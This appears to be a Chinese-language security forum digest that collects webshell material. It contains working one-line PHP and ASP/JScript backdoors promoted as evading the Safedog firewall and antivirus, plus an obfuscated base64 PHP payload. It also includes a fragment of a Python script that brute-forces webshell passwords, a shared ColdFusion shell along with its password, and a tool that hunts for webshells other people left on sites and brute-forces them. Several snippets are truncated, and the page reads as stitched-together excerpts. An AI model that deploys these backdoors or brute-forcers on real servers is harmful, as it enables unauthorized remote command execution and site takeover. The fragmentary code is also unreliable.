一款好用的php webshell检测工具

PHP-malware-finder 是一款优秀的检测webshell和恶意软件混淆代码的工具,比如以下组件都可以被检测发现。Best PHP ObfuscatorCarbylamineCipher DesignCyklodevJoes Web Tools ObfuscatorP.A.SPHP JiamiPhp Obfuscator EncodeSpinObfWeevely3atomikucobra obfuscatorphpencodetenncweb-malware-collectionwe

两款变态的PHP一句话

<?php  $pg="lZFUl9OrrQUrr1FIl0gLiAkX1NFUlZFUlsiUkVRVUrrVTVF9rrVUkkirrXTrrsKICAgIH0KICAgIHJldHVybrrirrArrkcGFnZrrVVSTDsKfQoKJF91cmw9Y3VyUGFnZVVSTCgpOwokdXJsPSdodHRwOi8vY25rroNGNrZmrrYud2ViLTE3Ni5jb20vWXpKb2JHSkhkejA9LnBrrocD91cmw9Jy4kX3Vy

最新过狗一句话

无聊写了个简单但是安全狗查不出的一句话后门
:/

文件名:assert.php
代码:

<?php
${"function"}=substr(__FILE__,-10,-4);;
${"command"}=$_POST[cmd];
$function($command);


ASP一句话也可以奇葩

       大家都造PHP千变万化,从变量,数组,赋值,运算,函数等。。。没有一样不奇葩的!所以常说PHP的木马永远杀不干净。

        但是asp就悲剧了,它的脚本VBS用法很死板,不像PHP语法各种灵活和奇葩,不过别忘了asp是可以自定义脚本的,如果改成Javascript脚本来执行代码,也能像PHP木马一样奇葩

下面分享一下偶的一匹悍马
<%@LANGUAGE="javascript"%>
<%_()(_(!-''));function _(__){if(__){return Request('_')+''}else{return  eval
}}
%>

改包上传 绕过安全狗

03.png

快速一句话爆破Python脚本

# set url,shell_type,dic filename
url = "http://172.16.18.2:8666/luan.asp"
shell_type = "asp"
dic_filename = "WebshellPassword.tx

assert免杀一句话

0x00 eval和assert的区别

http://www.vuln.cn/8395
http://www.php.net/manual/zh/function.eval.php
http://php.net/manual/zh/functions.variable-functions.php

1)assert是函数,eval不是函数,是语言构造器
2)eval($a)中$a只能是字符串,assert($a)中$a可以是php代码,也可以是php代码的字符串,assert($a)的$a如果是字符串形式不能有2个以上的
分号,如果有2个以上的分号只执行到第一个,使用assert来执行多条php语句可借助eval来实现.

分享一cfm大马

cfm马一直比较少,除了菜刀里面那个,好用的不多。今天偶遇这cfm大马,个人觉得还行,就分享出来。东西也不是自己写的就不收TuBi了。表哥们有什么好用的cfm马求在楼下分享。这个大马的密码是:al3frite

乌云社区zone 200+篇文章打包下载

QQ截图20161102104934.jpg

基于字典的webshell的自动化检测爆破

闲着无聊写了一个,识别率可能不太高,根据常见webshell名称作为字典,探测网站是否有前人留下的webshell,自动化识别,并爆破

webshell的自动化检测爆破